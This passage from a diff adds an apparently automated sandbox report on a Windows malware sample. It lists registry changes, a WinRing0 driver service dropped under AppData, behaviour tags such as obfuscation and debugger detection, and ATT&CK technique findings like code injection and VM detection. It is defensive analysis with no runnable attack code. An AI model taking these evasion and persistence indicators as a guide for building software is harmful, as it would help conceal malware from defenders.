+      "value": "09 00 00 00 01 00 00 00 2A 00 00 00 30 28 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 04 00 00 00 01 00 00 00 10 00 00 00 91 DE 06 25 AB DA FD 32 17 0C BB 25 17 2A 84 67 0F 00 00 00 01 00 00 00 14 00 00 00 5D 82 AD B9 0D 5D D3 C7 E3 52 4F 56 F7 87 EC 53 72 61 87 76 0B 00 00 00 01 00 00 00 52 00 00 00 47 00 6F 00 20 00 44 00 61 00 64 00 64 00 79 00 20 00 43 00 6C 00 61 00 73 00 73 00 20 00 32 00 20 00 43 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 41 00 75 00 74 00 68 00 6F 00 72 00 69 00 74 00 79 00 00 00 53 00 00 00 01 00 00 00 48 00 00 00 30 46 30 21 06 0B 60 86 48 01 86 FD 6D 01 07 17 03 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 30 21 06 0B 60 86 48 01 86 FD 6E 01 07 17 03 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 62 00 00 00 01 00 00 00 20 00 00 00 C3 84 6B F2 4B 9E 93 CA 64 27 4C 0E C6 7C 1E CC 5E 02 4F FC AC D2 D7 40 19 35 0E 81 FE 54 6A E4 14 00 00 00 01 0"
+    },
+    {
+      "key": "HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\\AutoDetect",
+      "value": "1"
+    },
+    {
+      "key": "HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\\UNCAsIntranet",
+      "value": "0"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\IndexTable\\FileIdIndex-{853201e6-2d75-11ea-a138-806e6f6e6963}\\_IndexName_"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE\\Blob",
+      "value": "7E 00 00 00 01 00 00 00 08 00 00 00 00 00 CF 97 A7 37 D6 01 7F 00 00 00 01 00 00 00 16 00 00 00 30 14 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 09 09 00 00 00 01 00 00 00 68 00 00 00 30 66 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 0A 2B 06 01 04 01 82 37 0A 03 04 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 08 02 02 06 08 2B 06 01 05 05 07 03 06 06 08 2B 06 01 05 05 07 03 07 06 08 2B 06 01 05 05 07 03 09 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 04 00 00 00 01 00 00 00 10 00 00 00 94 14 77 7E 3E 5E FD 8F 30 BD 41 B0 CF E7 D0 30 0F 00 00 00 01 00 00 00 14 00 00 00 BF 4D 2C 39 0B BF 0A A3 A2 B7 EA 2D C7 51 01 1B F5 FD 42 2E 0B 00 00 00 01 00 00 00 5C 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 20 00 54 00 72 00 75 00 73 00 74 00 20 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 20 00 2D 00 20 00 47 00 6C 00 6F 00 62 00 61 00 6C 00 53 00 69 00 67 00 6E 00 20 00 52 00 6F 00 6F 00 74 00 20 00 43 00 41 00 2D 00 52 00 32 00 00 00 62 00 00 00 01 00 00 0"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\663\\_FileId_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\663\\_ObjectLru_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\663\\_Usn_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\663\\_ObjectId_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\663\\AeFileID"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\663\\_UsnJournalId_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\663\\AeProgramID"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\662\\_FileId_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\662\\_ObjectLru_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\662\\_Usn_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\662\\_ObjectId_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\662\\AeFileID"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\662\\_UsnJournalId_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\662\\AeProgramID"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\661\\_FileId_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\661\\_ObjectLru_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\661\\_Usn_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\661\\_ObjectId_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\661\\AeFileID"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\661\\_UsnJournalId_"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\661\\AeProgramID"
+    },
+    {
+      "key": "HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\0174E68C97DDF1E0EEEA415EA336A163D2B61AFD\\Blob",
+      "value": "5C 00 00 00 01 00 00 00 04 00 00 00 00 10 00 00 04 00 00 00 01 00 00 00 10 00 00 00 0D BE 92 DE FF 7D 36 BB 48 C4 A6 B1 15 24 95 38 0F 00 00 00 01 00 00 00 20 00 00 00 53 FE B9 19 2E D4 80 F2 09 12 4A 2C 57 D7 E8 97 7A 2E 9F 39 46 1D BF 21 4D F1 12 CB 16 02 4F A2 14 00 00 00 01 00 00 00 14 00 00 00 78 B8 30 FD 63 AC 7B 89 4A 07 3B ED F6 8A 83 9C C3 52 02 65 19 00 00 00 01 00 00 00 10 00 00 00 B5 74 AF 30 C5 C1 BA 3A 69 A7 10 02 00 82 4D D0 03 00 00 00 01 00 00 00 14 00 00 00 01 74 E6 8C 97 DD F1 E0 EE EA 41 5E A3 36 A1 63 D2 B6 1A FD 20 00 00 00 01 00 00 00 F8 05 00 00 30 82 05 F4 30 82 03 DC A0 03 02 01 02 02 09 00 E0 EA 61 4C 28 56 32 64 30 0D 06 09 2A 86 48 86 F7 0D 01 01 0B 05 00 30 81 8E 31 0B 30 09 06 03 55 04 06 13 02 49 4C 31 0F 30 0D 06 03 55 04 08 0C 06 43 65 6E 74 65 72 31 0C 30 0A 06 03 55 04 07 0C 03 4C 6F 64 31 10 30 0E 06 03 55 04 0A 0C 07 47 6F 50 72 6F 78 79 31 10 30 0E 06 03 55 04 0B 0C 07 47 6F 50 72 6F 78 79 31 1A 30 18 06 03 55 04 03 0C 11 67 6F 70 72 6F 78 79 2E 67 69 74 68 75 62 2E 69 6"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\590D2D7D884F402E617EA562321765CF17D894E9\\Blob",
+      "value": "09 00 00 00 01 00 00 00 20 00 00 00 30 1E 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 04 00 00 00 01 00 00 00 10 00 00 00 2B 9B 9E E4 7B 6C 1F 00 72 1A CC C1 77 79 DF 6A 0F 00 00 00 01 00 00 00 20 00 00 00 56 8B 40 EB 6F 00 6B 46 50 7D A6 36 7D 04 6B 6B 3E 31 7C 83 41 45 95 E7 86 E4 84 07 F4 12 6F 3E 0B 00 00 00 01 00 00 00 3A 00 00 00 54 00 2D 00 54 00 65 00 6C 00 65 00 53 00 65 00 63 00 20 00 47 00 6C 00 6F 00 62 00 61 00 6C 00 52 00 6F 00 6F 00 74 00 20 00 43 00 6C 00 61 00 73 00 73 00 20 00 32 00 00 00 62 00 00 00 01 00 00 00 20 00 00 00 91 E2 F5 78 8D 58 10 EB A7 BA 58 73 7D E1 54 8A 8E CA CD 01 45 98 BC 0B 14 3E 04 1B 17 05 25 52 14 00 00 00 01 00 00 00 14 00 00 00 BF 59 20 36 00 79 A0 A0 22 6B 8C D5 F2 61 D2 B8 2C CB 82 4A 1D 00 00 00 01 00 00 00 10 00 00 00 BB 93 63 D0 A9 9E D5 FF 02 73 2E 4F C0 42 63 0C 03 00 00 00 01 00 00 00 14 00 00 00 59 0D 2D 7D 88 4F 40 2E 61 7E A5 62 32 17 65 CF 17 D8 94 E9 19 00 00 00 01 00 00 00 10 00 00 00 3F 83 9D 9F FA 39 99 B"
+    },
+    {
+      "key": "\\\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Middle East Standard Time\\TZI"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\_CurrentObjectId_"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\CABD2A79A1076A31F21D253635CB039D4329A5E8\\Blob",
+      "value": "19 00 00 00 01 00 00 00 10 00 00 00 2F E1 F7 0B B0 5D 7C 92 33 5B C5 E0 5B 98 4D A6 03 00 00 00 01 00 00 00 14 00 00 00 CA BD 2A 79 A1 07 6A 31 F2 1D 25 36 35 CB 03 9D 43 29 A5 E8 1D 00 00 00 01 00 00 00 10 00 00 00 73 B6 87 61 95 F5 D1 8E 04 85 10 42 2A EF 04 E3 14 00 00 00 01 00 00 00 14 00 00 00 79 B4 59 E6 7B B6 E5 E4 01 73 80 08 88 C8 1A 58 F6 E9 9B 6E 09 00 00 00 01 00 00 00 16 00 00 00 30 14 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 01 0B 00 00 00 01 00 00 00 1A 00 00 00 49 00 53 00 52 00 47 00 20 00 52 00 6F 00 6F 00 74 00 20 00 58 00 31 00 00 00 62 00 00 00 01 00 00 00 20 00 00 00 96 BC EC 06 26 49 76 F3 74 60 77 9A CF 28 C5 A7 CF E8 A3 C0 AA E1 1A 8F FC EE 05 C0 BD DF 08 C6 0F 00 00 00 01 00 00 00 20 00 00 00 3F 04 11 ED E9 C4 47 70 57 D5 7E 57 88 3B 1F 20 5B 20 CD C0 F3 26 31 29 B1 EE 02 69 A2 67 8F 63 20 00 00 00 01 00 00 00 6F 05 00 00 30 82 05 6B 30 82 03 53 A0 03 02 01 02 02 11 00 82 10 CF B0 D2 40 E3 59 44 63 E0 BB 63 82 8B 00 30 0D 06 09 2A 86 48 86 F7 0D 01 01 0B 05 00 30 4F 3"
+    },
+    {
+      "key": "HKU\\S-1-5-18\\Software\\Classes\\Local Settings\\MuiCache\\17b\\52C64B7E\\LanguageList",
+      "value": "en-US\nen\n"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\\Blob",
+      "value": "7E 00 00 00 01 00 00 00 08 00 00 00 00 80 C8 2B 68 86 D7 01 09 00 00 00 01 00 00 00 34 00 00 00 30 32 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 5C 00 00 00 01 00 00 00 04 00 00 00 00 08 00 00 19 00 00 00 01 00 00 00 10 00 00 00 0F 3A 05 27 D2 42 DE 2D C9 8E 5C FC B1 E9 91 EE 03 00 00 00 01 00 00 00 14 00 00 00 A8 98 5D 3A 65 E5 E5 C4 B2 D7 D6 6D 40 C6 DD 2F B1 9C 54 36 1D 00 00 00 01 00 00 00 10 00 00 00 59 77 9E 39 E2 1A 2E 3D FC ED 68 57 ED 5C 5F D9 0B 00 00 00 01 00 00 00 12 00 00 00 44 00 69 00 67 00 69 00 43 00 65 00 72 00 74 00 00 00 14 00 00 00 01 00 00 00 14 00 00 00 03 DE 50 35 56 D1 4C BB 66 F0 A3 E2 1B 1B C3 97 B2 3D D1 55 62 00 00 00 01 00 00 00 20 00 00 00 43 48 A0 E9 44 4C 78 CB 26 5E 05 8D 5E 89 44 B4 D8 4F 96 62 BD 26 DB 25 7F 89 34 A4 43 C7 01 61 0F 00 00 00 01 00 00 00 14 00 00 00 B3 4D DD 37 2E D9 2E 8F 2A BF BB 9E 20 A9 D3 1F 20 4F 19 4B 04 00 00 00 01 00 00 00 10 00 00 00 79 E4 A9 8"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\LruList\\0000000000002B6D\\ObjectLru"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\LruList\\0000000000002B6D\\ObjectId"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\IndexTable\\FileIdIndex-{853201e6-2d75-11ea-a138-806e6f6e6963}\\2000000000050F\\661"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\\Blob",
+      "value": "7E 00 00 00 01 00 00 00 08 00 00 00 00 C0 03 2F 2D F8 D6 01 7F 00 00 00 01 00 00 00 2A 00 00 00 30 28 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 5C 00 00 00 01 00 00 00 04 00 00 00 00 08 00 00 19 00 00 00 01 00 00 00 10 00 00 00 D8 B5 FB 36 84 68 62 02 75 D1 42 FF D2 AA DE 37 03 00 00 00 01 00 00 00 14 00 00 00 4E B6 D5 78 49 9B 1C CF 5F 58 1E AD 56 BE 3D 9B 67 44 A5 E5 1D 00 00 00 01 00 00 00 10 00 00 00 C6 CB CA FA 17 95 5C 4C FD 41 EC A0 C6 54 C3 61 0B 00 00 00 01 00 00 00 12 00 00 00 56 00 65 00 72 00 69 00 53 00 69 00 67 00 6E 00 00 00 14 00 00 00 01 00 00 00 14 00 00 00 7F D3 65 A7 C2 DD EC BB F0 30 09 F3 43 39 FA 02 AF 33 31 33 62 00 00 00 01 00 00 00 20 00 00 00 9A CF AB 7E 43 C8 D8 80 D0 6B 26 2A 94 DE EE E4 B4 65 99 89 C3 D0 CA F1 9B AF 64 05 E4 1A B7 DF 0F 00 00 00 01 00 00 00 14 00 00 00 E9 1E 1E 97 2B 8F 46 7A B4 E0 59 8F A9 22 85 38 7D EE 94 C9 04 00 00 00 01 00 00 00 10 00 00 00 CB 17 E4 31 67 3E E2 09 FE 45 57 93 F3 0"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\LruList\\0000000000002B6A\\ObjectLru"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\LruList\\0000000000002B6A\\ObjectId"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\IndexTable\\FileIdIndex-{853201e6-2d75-11ea-a138-806e6f6e6963}\\100000001E755\\662"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\661\\Indexes\\FileIdIndex-{853201e6-2d75-11ea-a138-806e6f6e6963}\\2000000000050F"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\662\\Indexes\\FileIdIndex-{853201e6-2d75-11ea-a138-806e6f6e6963}\\100000001E755"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\\Blob",
+      "value": "09 00 00 00 01 00 00 00 2A 00 00 00 30 28 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 04 00 00 00 01 00 00 00 10 00 00 00 32 4A 4B BB C8 63 69 9B BE 74 9A C6 DD 1D 46 24 0F 00 00 00 01 00 00 00 14 00 00 00 0F 6A AD 4C 3F E0 46 19 CD C8 B2 BD 65 5A A1 A2 60 42 E6 50 0B 00 00 00 01 00 00 00 54 00 00 00 53 00 74 00 61 00 72 00 66 00 69 00 65 00 6C 00 64 00 20 00 43 00 6C 00 61 00 73 00 73 00 20 00 32 00 20 00 43 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 41 00 75 00 74 00 68 00 6F 00 72 00 69 00 74 00 79 00 00 00 53 00 00 00 01 00 00 00 48 00 00 00 30 46 30 21 06 0B 60 86 48 01 86 FD 6D 01 07 17 03 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 30 21 06 0B 60 86 48 01 86 FD 6E 01 07 17 03 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 62 00 00 00 01 00 00 00 20 00 00 00 14 65 FA 20 53 97 B8 76 FA A6 F0 A9 95 8E 55 90 E4 0F CC 7F AA 4F B7 C2 C8 67 75 21 FB 5F B6 58 14 00 00 0"
+    },
+    {
+      "key": "\\\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Greenland Standard Time\\TZI"
+    },
+    {
+      "key": "HKU\\S-1-5-21-575823232-3065301323-1442773979-1000_CLASSES\\Local Settings\\MuiCache\\17b\\52C64B7E\\LanguageList",
+      "value": "en-US\nen\n"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\IndexTable\\FileIdIndex-{853201e6-2d75-11ea-a138-806e6f6e6963}\\3000000000061F\\663"
+    },
+    {
+      "key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\StateIndex",
+      "value": "1"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\LruList\\CurrentLru"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\ObjectTable\\663\\Indexes\\FileIdIndex-{853201e6-2d75-11ea-a138-806e6f6e6963}\\3000000000061F"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASAPI32\\FileDirectory",
+      "value": "%windir%\\tracing"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASAPI32\\MaxFileSize",
+      "value": "1048576"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASAPI32\\ConsoleTracingMask",
+      "value": "4294901760"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASAPI32\\FileTracingMask",
+      "value": "4294901760"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASAPI32\\EnableConsoleTracing",
+      "value": "0"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASAPI32\\EnableFileTracing",
+      "value": "0"
+    },
+    {
+      "key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{875AD87C-FB4E-42F3-A09C-40EBFE1BC853}\\DynamicInfo"
+    },
+    {
+      "key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{875AD87C-FB4E-42F3-A09C-40EBFE1BC853}\\Path"
+    },
+    {
+      "key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{875AD87C-FB4E-42F3-A09C-40EBFE1BC853}\\Hash"
+    },
+    {
+      "key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{875AD87C-FB4E-42F3-A09C-40EBFE1BC853}\\Triggers"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\LruList\\0000000000002B67\\ObjectLru"
+    },
+    {
+      "key": "\\\\REGISTRY\\A\\{de1dc1b3-9e91-11ea-b112-167c9a143b07}\\DefaultObjectStore\\LruList\\0000000000002B67\\ObjectId"
+    },
+    {
+      "key": "\\\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Paraguay Standard Time\\TZI"
+    },
+    {
+      "key": "HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\22\\(Default)"
+    },
+    {
+      "key": "HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff00",
+      "value": "00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF"
+    },
+    {
+      "key": "HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff01",
+      "value": "00 00 00 00 6D 00 00 00 19 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF"
+    },
+    {
+      "key": "HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff02",
+      "value": "01 00 00 00 5A 00 00 00 D6 17 00 00 FF FF FF FF FF FF FF FF FF FF FF FF"
+    },
+    {
+      "key": "HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff03",
+      "value": "00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime",
+      "value": "F6 72 75 AB 93 B7 D7 01"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl",
+      "value": "30 83 02 74 EA 06 09 2A 86 48 86 F7 0D 01 07 02 A0 83 02 74 DA 30 83 02 74 D5 02 01 01 31 0F 30 0D 06 09 60 86 48 01 65 03 04 02 01 05 00 30 83 02 64 E9 06 09 2B 06 01 04 01 82 37 0A 01 A0 83 02 64 D9 30 83 02 64 D4 30 0C 06 0A 2B 06 01 04 01 82 37 0A 03 09 02 09 14 01 D7 A6 5E 3C 17 71 93 17 0D 32 31 30 39 31 30 31 36 30 39 32 39 5A 30 09 06 05 2B 0E 03 02 1A 05 00 30 83 02 64 9C 30 82 01 44 04 14 CD D4 EE AE 60 00 AC 7F 40 C3 80 2C 17 1E 30 14 80 30 C0 72 31 82 01 2A 30 18 06 0A 2B 06 01 04 01 82 37 0A 0B 68 31 0A 04 08 00 80 C8 2B 68 86 D7 01 30 18 06 0A 2B 06 01 04 01 82 37 0A 0B 7E 31 0A 04 08 00 00 D9 B5 44 C1 D2 01 30 1E 06 0A 2B 06 01 04 01 82 37 0A 0B 69 31 10 04 0E 30 0C 06 0A 2B 06 01 04 01 82 37 3C 03 02 30 20 06 0A 2B 06 01 04 01 82 37 0A 0B 1D 31 12 04 10 F0 C4 02 F0 40 4E A9 AD BF 25 A0 3D DF 2C A6 FA 30 24 06 0A 2B 06 01 04 01 82 37 0A 0B 14 31 16 04 14 0E AC 82 60 40 56 27 97 E5 25 13 FC 2A E1 0A 53 95 59 E4 A4 30 30 06 0A 2B 06 01 04 01 82 37 0A 0B 62 31 22 04 20 88 5D E6 4C 34 0E 3E A7 06 5"
+    },
+    {
+      "key": "HKLM\\System\\CurrentControlSet\\Services\\WinRing0_1_2_0\\Start",
+      "value": "DWORD (0x00000003)"
+    },
+    {
+      "key": "HKLM\\System\\CurrentControlSet\\Services\\WinRing0_1_2_0\\ImagePath",
+      "value": "\\??\\%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Libs\\WR64.sys"
+    },
+    {
+      "key": "HKLM\\System\\CurrentControlSet\\Services\\WinRing0_1_2_0\\Start",
+      "value": "DWORD (0x00000004)"
+    },
+    {
+      "key": "HKLM\\SOFTWARE\\Microsoft\\Windows Media Player NSS\\3.0\\Servers\\A70D59A1-8EAD-4F40-AAAB-FBFC460800A4\\FriendlyName",
+      "value": "WORK: admin:"
+    },
+    {
+      "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\MpKslf4810a54\\Parameters"
+    },
+    {
+      "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\MpKslf4810a54\\Parameters\\Wdf"
+    },
+    {
+      "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\MpKslf4810a54\\Parameters\\Wdf\\WdfMajorVersion",
+      "value": "1"
+    },
+    {
+      "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\MpKslf4810a54\\Parameters\\Wdf\\WdfMinorVersion",
+      "value": "11"
+    }
+  ],
+  "tags": [
+    "DIRECT_CPU_CLOCK_ACCESS",
+    "CHECKS_NETWORK_ADAPTERS",
+    "DETECT_DEBUG_ENVIRONMENT",
+    "CALLS_WMI",
+    "RUNTIME_MODULES",
+    "CALLS_WMI",
+    "OBFUSCATED",
+    "DETECT_DEBUG_ENVIRONMENT",
+    "LONG_SLEEPS"
+  ],
+  "attack_techniques": {
+    "T1055": [
+      {
+        "description": "Creates a process in suspended mode (likely to inject code)",
+        "severity": "INFO"
+      },
+      {
+        "description": "Spawns processes",
+        "severity": "INFO"
+      }
+    ],
+    "T1083": [
+      {
+        "description": "Reads ini files",
+        "severity": "INFO"
+      }
+    ],
+    "T1057": [
+      {
+        "description": "Queries a list of all running processes",
+        "severity": "INFO"
+      }
+    ],
+    "T1053": [
+      {
+        "description": "Uses schtasks.exe or at.exe to add and modify task schedules",
+        "severity": "LOW"
+      }
+    ],
+    "T1036": [
+      {
+        "description": "Drops PE files to the windows directory (C:\\\\Windows)",
+        "severity": "INFO"
+      },
+      {
+        "description": "Creates files inside the user directory",
+        "severity": "INFO"
+      },
+      {
+        "description": "Creates files inside the system directory",
+        "severity": "INFO"
+      },
+      {
+        "description": "Drops a PE files to the windows directory (C:\\\\Windows) and starts it",
+        "severity": "LOW"
+      }
+    ],
+    "T1010": [
+      {
+        "description": "Sample monitors Window changes (e.g. starting applications), analyze the sample with the simulation cookbook",
+        "severity": "INFO"
+      }
+    ],
+    "T1518.001": [
+      {
+        "description": "Contains capabilities to detect virtual machines",
+        "severity": "INFO"
+      }
+    ],
+    "T1059": [
+      {
+        "description": "Very long cmdline option found, this is very uncommon (may be encrypted or packed)",
